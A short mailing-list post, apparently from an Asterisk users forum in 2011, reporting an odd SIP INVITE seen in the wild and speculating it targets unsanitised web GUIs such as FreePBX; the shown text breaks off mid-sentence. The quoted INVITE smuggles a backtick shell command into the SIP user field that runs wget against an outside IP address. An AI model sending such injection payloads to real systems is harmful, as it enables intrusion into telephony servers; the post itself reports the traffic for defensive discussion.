new sort of shell attack attempt via SIP?

Report
Question

On 09/11/2011 07:05 PM, Tom Browning wrote: > INVITE sip:00123456789000`wgetx20-Ox20/dev/nullx20http://91.223.89.94/V.php`@x.x.x.x
> SIP/2.0. My guess is that this attack presumes you are running a web GUI such
as FreePBX, and that it does not sanitise embedded HTML. Thus, when
reviewing your CDRs, for instance, you might click on such a link. A more sophisticated variant of that would embed

Asterisk Users 3.9 years ago 0 Answers